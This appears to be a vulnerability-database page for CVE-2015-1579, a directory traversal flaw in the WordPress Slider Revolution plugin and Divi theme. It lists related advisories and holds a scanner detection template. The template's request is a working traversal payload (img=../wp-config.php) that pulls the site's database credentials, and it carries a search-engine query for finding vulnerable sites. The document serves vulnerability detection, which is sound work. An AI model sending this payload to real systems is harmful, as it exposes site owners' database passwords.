| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Path Traversal in Elegantthemes Divi | 3 Feb 2017 12:00 | – | githubexploit |
| Exploit for Path Traversal in Elegantthemes Divi | 3 Feb 2016 21:44 | – | githubexploit |
| CVE-2015-1579 | 1 Sep 2014 00:00 | – | circl |
| WordPress Elegant Themes Divi Theme Directory Traversal Vulnerability | 21 Feb 2015 00:00 | – | cnvd |
| WordPress Slider Revolution Plugin Local File Inclusion (CVE-2014-9734; CVE-2015-1579) | 17 Dec 2014 00:00 | – | checkpoint_advisories |
| CVE-2015-1579 | 11 Feb 2015 19:00 | – | cve |
| CVE-2015-1579 | 11 Feb 2015 19:00 | – | cvelist |
| WordPress Slider Revolution Responsive File Disclosure | 12 Jan 2015 00:00 | – | dsquare |
| KLA10491 Multiple vulnerabilities in WordPress plugins | 17 Mar 2015 00:00 | – | kaspersky |
| CVE-2015-1579 | 11 Feb 2015 19:59 | – | nvd |

```yaml
id: CVE-2015-1579

info:
  name: WordPress Slider Revolution - Local File Disclosure
  author: pussycat0x
  severity: medium
  description: |
    Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
  impact: |
    An attacker can read arbitrary files on the server, potentially exposing sensitive information.
  remediation: |
    Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability.
  reference:
    - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
    - https://cxsecurity.com/issue/WLB-2021090129
    - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
    - https://nvd.nist.gov/vuln/detail/CVE-2015-1579
    - https://wpvulndb.com/vulnerabilities/7540
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-1579
    cwe-id: CWE-22
    epss-score: 0.22055
    epss-percentile: 0.97355
    cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: elegant_themes
    product: divi
    framework: wordpress
    google-query: inurl:/wp-content/plugins/revslider
  tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
      - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'DB_NAME'"
          - "'DB_PASSWORD'"
          - "'DB_USER'"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022078f83a479afdfaa53ee3955198c130129f15b2e1749ed6d7a108d83d5e457269022100d504754c1dd25b5dcc1ec4459e6584be5fbf8dd851e49ca73cae0c73e6b5bb52:922c64590222798bb761d5b6d8e72950
```